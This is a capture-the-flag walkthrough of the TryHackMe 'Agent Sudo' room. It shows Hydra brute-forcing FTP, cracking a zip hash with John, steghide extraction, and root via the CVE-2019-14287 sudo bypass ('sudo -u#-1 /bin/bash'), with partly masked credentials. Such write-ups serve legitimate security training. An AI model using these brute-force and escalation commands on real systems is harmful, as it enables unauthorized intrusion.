6 minutes
THM: Agent Sudo
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.124.139 -oA nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-12 22:33 GMT
Nmap scan report for 10.10.124.139
Host is up (0.040s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Annoucement
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.58 seconds
Website
Nmap didnt indicate FTP had anonymous access, so lets start with the website
Based on the message we can guess we need to put a value into the User-Agent request header. The agent codename are letters, so using the developer tools in firefox we can just edit and resend the request and adjust the header. Cycling through letters when we get to C we are shown a different message which also reveals a potential username
FTP
Using Hydra we can brute force the FTP login for the user chris
# hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.124.139 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service
organizations, or for illegal purposes (this is non-binding, these *** ignore laws and etehics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-12 22:56:21
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525
[DATA] attacking ftp://10.10.124.139:21/
[21][ftp] host: 10.10.124.139 login: chris password: c*****l
[STATUS] 14344399.00 tries/min, 14344399 tries in 00:01h, 1 to do in 00:01h, 15 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-12 22:57:23
Now lets connect and download all the files
# ftp -A 10.10.124.139
Connected to 10.10.124.139.
220 (vsFTPd 3.0.3)
Name (10.10.124.139:root): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
ftp> prompt
Interactive mode off.
ftp> mget *.*
local: To_agentJ.txt remote: To_agentJ.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).
100% |******************************************************| 217 2.79 MiB/s 00:00 ETA
226 Transfer complete.
217 bytes received in 00:00 (10.27 KiB/s)
local: cute-alien.jpg remote: cute-alien.jpg
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for cute-alien.jpg (33143 bytes).
100% |******************************************************| 33143 788.99 KiB/s 00:00 ETA
226 Transfer complete.
33143 bytes received in 00:00 (529.47 KiB/s)
local: cutie.png remote: cutie.png
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for cutie.png (34842 bytes).
100% |******************************************************| 34842 822.90 KiB/s 00:00 ETA
226 Transfer complete.
34842 bytes received in 00:00 (556.46 KiB/s)
Decoding
We now have 3 files - A txt file and 2 images. Looking inside the txt file we have the following message indicating something is hidden in the images
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C
We use binwalk to check the images and it looks like the png file contains a zip file
# binwalk -e cutie.png --run-as=root
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22
# ls _cutie.png.extracted
365 365.zlib 8702.zip
So we now have this extracted 8702.zip file, however it appears to be a password protected zip. Lets extract the hash and crack it
# zip2john 8702.zip > hash
# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
a**** (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE (2025-03-12 23:22) 1.562g/s 38400p/s 38400c/s 38400C/s michael!..280789
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now we unzip the file with 7z e 8702.zip and enter the password when prompted. This gives us another text file
To_agentR.txt
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
The quoted value looks encoded so we chuck into CyberChef which reveals it is “Area51” encoded in base64. Now lets turn our attention to the final file and check if for steganography (as the questions prompt)
# steghide info cute-alien.jpg
"cute-alien.jpg":
format: jpeg
capacity: 1.8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "message.txt":
size: 181.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
# steghide extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt".
And finally looking in this message gives us another username and a password
Hi james,
Glad you find this message. Your login password is h**********!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
SSH
The credentials work and we can login as james. The user.txt flag is there so we can cat that out and move on. There is also an image for one of the questions. Simply use SCP to get the image and reverse image search it to get the answer. Now onto root!
Privilege escalation
Checking our sudo privileges there is an entry allowing james to run /bin/bash as any user apart from root. However based on this entry and checking the sudo version (1.8.21p2) the system is vulnerable to CVE-2019-14287. We can escalate to root and get the final flag
james@agent-sudo:~$ sudo -u#-1 /bin/bash
root@agent-sudo:~# cd /root
root@agent-sudo:/root# ls
root.txt
root@agent-sudo:/root# cat root.txt
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
b******************************2
By,
****** a.k.a Agent R